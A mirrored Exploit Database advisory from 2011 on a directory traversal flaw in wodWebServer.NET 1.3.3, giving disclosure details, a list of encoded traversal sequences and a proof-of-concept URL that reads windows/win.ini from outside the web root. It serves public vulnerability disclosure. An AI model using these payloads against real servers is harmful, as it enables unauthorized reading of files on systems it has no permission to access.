wodWebServer.NET 1.3.3 – Directory Traversal

• Exploit Database
• 13 阅读

• 作者： AutoSec Tools
  日期： 2011-03-27
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17053/

• ------------------------------------------------------------------------
  Software................wodWebServer.NET 1.3.3
  Vulnerability...........Directory Traversal
  Threat Level............Serious (3/5)
  Download................http://www.weonlydo.com/WebServer.NET/web-http-net-server.asp
  Vendor Contact Date.....3/13/2011
  Disclosure Date.........3/27/2011
  Tested On...............Windows Vista
  ------------------------------------------------------------------------
  Author..................AutoSec Tools
  Site....................http://www.autosectools.com/
  Email...................John Leitch <john@autosectools.com>
  ------------------------------------------------------------------------
  
  
  --Description--
  
  A directory traversal vulnerability in wodWebServer.NET 1.3.3 can be
  exploited to read files outside of the web root.
  
  
  --Exploit--
  
  ..%5C/
  ..%2F/
  ..%2E/
  ..\/
  ..//
  .../
  ..\
  ../
  
  
  --PoC--
  
  http://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows%5C/win.ini